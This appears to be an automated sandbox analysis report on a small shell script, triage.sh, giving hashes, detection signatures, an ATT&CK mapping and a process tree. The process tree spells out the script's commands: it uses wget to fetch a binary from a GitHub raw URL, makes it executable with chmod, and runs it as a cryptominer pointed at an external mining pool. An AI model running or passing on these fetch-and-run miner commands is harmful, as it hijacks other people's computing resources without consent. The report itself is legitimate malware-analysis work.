6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db

Analysis

max time kernel
7s
max time network
897s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
14/07/2024, 09:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

triage.sh
Size

338B
MD5

dead3dccf4825eb422f4dac04f2d8279
SHA1

61285497f6daecf9d6d6128d5ced6f19057f93bd
SHA256

6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db
SHA512

c4c5fc0a655488ea60b4d5801cab925e180e3d018f88e9238eb9bc794ddc73ec44059fad796cb1655fed44a7c861990d5960eb7a41f8fa4a24390cb27cd1f55b

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/cc	1593	cc

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/fd	apt-get
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1578/cgroup	http
File opened for reading	/proc/1586/cgroup	http
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1/cgroup	http
File opened for reading	/proc/sys/kernel/ngroups_max	apt-get
File opened for reading	/proc/1/cgroup	http
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/1/limits	sudo
File opened for reading	/proc/1/cgroup	http
File opened for reading	/proc/1585/cgroup	http

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/cc	wget

/tmp/triage.sh
/tmp/triage.sh
1⤵
PID:1560
- /usr/bin/sudo
  sudo apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
  2⤵
  - Reads runtime system information
  PID:1561
- - /usr/bin/apt-get
    apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
    3⤵
    - Reads runtime system information
    PID:1571
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:1572
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:1573
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      PID:1577
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      Reads runtime system information
      PID:1578
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      Reads runtime system information
      PID:1585
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      Reads runtime system information
      PID:1586
- /usr/bin/wget
  wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc
  2⤵
  - Writes file to tmp directory
  PID:1587
- /usr/bin/chmod
  chmod +x cc
  2⤵
  PID:1590
- /usr/bin/clear
  clear
  2⤵
  PID:1591
- /usr/bin/nproc
  nproc
  2⤵
  PID:1592
- /tmp/cc
  ./cc -a verus -o stratum+tcp://verus.farm:9999 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Linux -p x -t 1
  2⤵
  - Executes dropped EXE
  PID:1593

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
180B

MD5
0e4286681cdb649f574d568bf0d803f0

SHA1
b6c217dd857fe460e2ba28a841daef0158a19edf

SHA256
f43ac73ba80acc15bd3e2530081d8df5b13fc818750a0dc5ccc9ff693a6ad3fc

SHA512
9c6f910eb58acdb7dcf3ed3e44e4accfb6bc8cba13432c621b4ff4d04aa232ee949c3052ba71020b92baafaebaad2970ad7261e0177e7fdf6a930d40c9c67f0d

Download Submit
/tmp/cc

Filesize
196KB

MD5
4011d473f6b06caa7f3d514e4eeb2184

SHA1
529bda4d64920cac51baa6b34b8bcabf19d97248

SHA256
bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2

SHA512
45f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39

Download Submit
/var/cache/apt/archives/partial/autoconf_2.71-2_all.deb

Filesize
329KB

MD5
a5c1029062b287f8df7b37dc43c9264f

SHA1
f8eeb30ce97e0b41f14feb86bd0e02a600efcded

SHA256
96b528889794c4134015a63c75050f93d8aecdf5e3f2a20993c1433f4c61b80e

SHA512
c450fb56789f533ac939beeaf19019aeaee417bc8de4b3234b0ac4a3575f114d803046f0475264d70a7b724727d2be4a4ce49023f120086b179ebf4e123018e7

Download Submit
/var/cache/apt/archives/partial/automake_1%3a1.16.5-1.3_all.deb

Filesize
544KB

MD5
eeea4b7cf5024babf73a4dd96a6f5790

SHA1
0950f7e15117bd6f7167b11bcd12801a98111fbf

SHA256
59e3890fc8407bcf8ccc9f709d6513156346d5c942e8c624dc90435e58f6f978

SHA512
078de0cb9f0393d8bdfa7d1b5db0eb718125e15a65bd6038866cb9f84b033440087cbcc8f773af2102a14c42dd71360b988986fbbc679bcabe1dfc1c66c5d931

Download Submit
/var/cache/apt/archives/partial/autotools-dev_20220109.1_all.deb

Filesize
43KB

MD5
554dc72dc46c7ebd3caf852031a94fe8

SHA1
2899e7c9989ee14a2be5a5a431a49498e1494084

SHA256
d909f0327b09d9a9136239caca975df89782fa28efd721c4eb4caea422d3fc5a

SHA512
b3add366e8549028f8de8c1c21796ff1ed8831e3432dedac73e795e021bcd23fb0c4e5fcbaf6f512b21b2f5d1c747bc7bccad1719a3255988ff2d7f5ce81f3d4

Download Submit
/var/cache/apt/archives/partial/libcurl4-openssl-dev_7.81.0-1ubuntu1.16_amd64.deb

Filesize
376KB

MD5
888058d6427ed97a3eccf59cb9867b2d

SHA1
66c360985b77680e27b1ed44ed7c9946b6f12211

SHA256
f74a1c1d0348601ad1baa8b32011f71f8e486099904492fe48e3fb3172c87c5e

SHA512
4e0f93a220de35ae77552057cc7922d5f454493060776afd61306ef735302dc725625c974f9c37e2e2f32d47e90d07e5652671e51fc43fd5b002c48524e65a74

Download Submit
/var/cache/apt/archives/partial/libjansson-dev_2.13.1-1.1build3_amd64.deb

Filesize
34KB

MD5
48df7bbc36d5cb03b7352ffb938b01b7

SHA1
78d69ae257c47adba4ef33ed36d7ebb355df9de9

SHA256
d2cead9aa3c370c58a1c2ee68bdc56ab13dea7cc2e636d87da5e762410b4d238

SHA512
1dd5e3a2a15fe02219ba07009adf8b1b371b4ab03223d3381d9c26378d777b21f4cc8b65a408d0c85cfeb558685cd8a01c0884f677fe2eee4d03ba0c0054b18b

Download Submit
/var/cache/apt/archives/partial/libllvm14_1%3a14.0.0-1ubuntu1.1_amd64.deb

Filesize
22.9MB

MD5
04f816be048abfc53e8ddce7179b329a

SHA1
646be437f934b568f42bf659df1bd86703295672

SHA256
9044b614a6c7fb6262e7cbeb13dc731fc0c92bed96281c1a3920dd706442ee8e

SHA512
412647a0187117f0764eec27e6668346421bbc8d3bac2591248b8c0cf062b0724ee833ea3d490d651b3d43362e758ca38bb24285d495592432a7d4d5c90df9ee

Download Submit
/var/cache/apt/archives/partial/libomp-14-dev_1%3a14.0.0-1ubuntu1.1_amd64.deb

Filesize
338KB

MD5
151772c05a23abdbfabf36caec2970ed

SHA1
a012872cbe6b8b0eaf0fb116e7d7425aa5c6d2a6

SHA256
ce3d72f3d7c1b499b156303c8415e729fe027da7ab2f45653e92e3e64593c402

SHA512
7b4be36bcc7b6d140151c9f2e703efd5454b1356e8cf17552903ebbfb62bc57db974a3ca5de56a9a714396233a73b86aabf4dd8910abc6222c90a48e6860be29

Download Submit
/var/cache/apt/archives/partial/libomp-dev_1%3a14.0-55~exp2_amd64.deb

Filesize
3KB

MD5
e36568cabd91924b5158979ddc670e12

SHA1
09ea25565a7d225432800404b1fae96c954f2fda

SHA256
445f75e6fd75fe5606e7a2855b8bf13ddb4301ae4ed6d364d30b5e403f86e634

SHA512
2a79b3a5ae5bf9ecf6a757588ab99086962053a46397318152fa59d039a761f7c09fc34c28608c682ea1bd01e68846916505349d6e6dc4469b49023c170c1df7

Download Submit
/var/cache/apt/archives/partial/libomp5-14_1%3a14.0.0-1ubuntu1.1_amd64.deb

Filesize
379KB

MD5
43e99ed785c926bc2dd92553ddbc758b

SHA1
8d3db5fc8140ebbe7dfa7cd69008871564198e9f

SHA256
7b69ec021dd19555c16e250827f57be88381ff2fff9bdbd1b3a2d25d27558cea

SHA512
db068750b9367f361aa883f4412c0d02606838c5ef13aeec0935caf62ea8bbf590986971636fc369583af401ba8e8f250d1818a0c58a75593b6c214590c3432c

Download Submit
/var/cache/apt/archives/partial/m4_1.4.18-5ubuntu2_amd64.deb

Filesize
194KB

MD5
37ff1a23261e591841876b445fb64269

SHA1
7a851efc87635d8c691f3b5513c9b3c960c76f03

SHA256
572a544d2c18bf49d25c465720c570cd8e6e38731386ac9c0a7f29bed2486f3e

SHA512
93e92c12d65be24be49c20a004c8d6ce55ad5f9c788b6a8092808796c6c4670acdccd5b8591152967117647757fcdbf571ebadd1342ac9729ea88c8e625b61b6

Download Submit